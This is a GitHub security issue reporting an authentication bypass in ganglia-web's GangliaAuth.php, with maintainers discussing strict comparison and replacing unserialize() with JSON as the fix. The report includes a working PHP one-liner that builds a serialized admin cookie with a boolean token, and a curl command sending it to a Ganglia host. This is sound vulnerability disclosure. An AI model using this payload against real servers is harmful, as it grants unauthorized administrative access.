New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[Security] auth bypass #267
Comments
|
Thanks for reporting. We'll look into fixing this shortly cc/ @alexdean |
|
phew. been a while since i was in this code. sounds like strict equality checking would resolve the problem? if($this->getAuthToken($data['user']) === $data['token']) { |
|
Yes. But i'm strongly recommend to replace unserialize() to json_decode(). |
|
Some more Ganglia security info: |
|
Is there an ETA for a fix? |
|
I think the fix I mentioned above will be sufficient, but I don't have a dev environment set up to confirm with. I don't think it's likely I'll have time to set one up in the near future. |
|
Per d0znpp suggestion I will be changing serialization to use json_encode/decode. |
|
I will try to get a release published by Friday 10/2/2015 |
|
FreeBSD port updated. |
It's easy to bypass auth by using boolean serialization like this:
$ php -r "echo urlencode(serialize(array('user'=>'admin', 'group'=>'admin', 'token'=>true)));"
Vulnerable code listed below:
ganglia-web/lib/GangliaAuth.php
Lines 34 to 46 in 4e98ea6
// Found by d90.andrew
// Exploit: curl -H 'Cookie: a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22group%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22token%22%3Bb%3A1%3B%7D' http://ganglia.local/ganglia/
The text was updated successfully, but these errors were encountered: